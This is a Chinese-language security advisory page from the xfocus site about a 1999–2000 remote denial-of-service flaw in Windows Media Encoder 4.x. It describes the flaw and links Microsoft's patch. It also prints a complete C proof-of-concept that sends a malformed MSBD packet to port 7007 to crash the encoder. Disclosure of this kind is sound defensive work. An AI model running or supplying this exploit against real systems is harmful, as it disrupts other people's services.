xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Microsoft Media Encoder 拒绝服务漏洞


发布时间:1999-12-01
更新时间:1999-12-01
严重程度:
威胁程度:远程拒绝服务
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Microsoft Windows Media Encoder 4.0,4.1
详细描述
Windows Media Encoder是Windows Media Services的一部分。它是用来将数字内容转化为 Windows多媒体格式,以便通过运行在Windows NT或者Windows 2000上的多媒体服务程序发送。 如果发送一个错误格式的请求给Windows Media Encoder,它就会出错崩溃,不能再将格式化好的多媒体数据传送给Windoes Media Server.

测试代码
/*
*
* Media Streaming Broadcast Distribution (MSBD)
* Denial of Service Attack
*
* (C) 2000 Kit Knox <kit@rootshell.com> - Public Release: 05/31/00
*
* Causes the Windows Media Encoder to crash with a "Runtime Error!"
*
* "NSREX caused an invalid page fault in module MFC42.DLL at 0177:5f4012a1".
*
* Tested on version 4.1.0.3920 file "NsRex.exe" 998KB 1/11/00.
*
* Official Microsoft patch is available :
*
* http://www.microsoft.com/technet/security/bulletin/ms00-038.asp
*
* Thanks to Microsoft and the WMT group for their prompt attention to this
* matter.
*
*/

#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>

char bogus_msbd_packet1[] = {
0x4d, 0x53, 0x42, 0x20, 0x06, 0x01, 0x07, 0x00, 0x24, 0x00, 0x00, 0x40,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x4e, 0x00,
0x65, 0x00, 0x74, 0x00, 0x00, 0x50, 0x53, 0x00, 0x68, 0x00, 0x6f, 0x00,
0x77, 0x00, 0x00, 0x00
};

int sock;

int main(int argc, char *argv[]) {
  struct hostent *he;
  struct sockaddr_in sa;
  char buf[1024];
  
  if (argc != 2) {
    fprintf(stderr, "usage: %s <host/ip>\n", argv[0]);
    return(-1);
  }
  
  sock = socket ( AF_INET, SOCK_STREAM, 0);
  sa.sin_family = AF_INET;
  sa.sin_port = htons(7007);
  he = gethostbyname (argv[1]);
  if (!he) {
    if ((sa.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE)
      return(-1);
  } else {
    bcopy(he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
  }
  if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    fprintf(stderr, "Fatal Error: Can't connect to Windows Media Encoder.\n");
    return(-1);
  }
  write(sock, bogus_msbd_packet1, sizeof(bogus_msbd_packet1));
  for (;;) {
    read(sock, buf, sizeof(buf));
  }
}

解决方案
可以在下面的链接下载微软提供的补丁: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=21596

相关信息
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved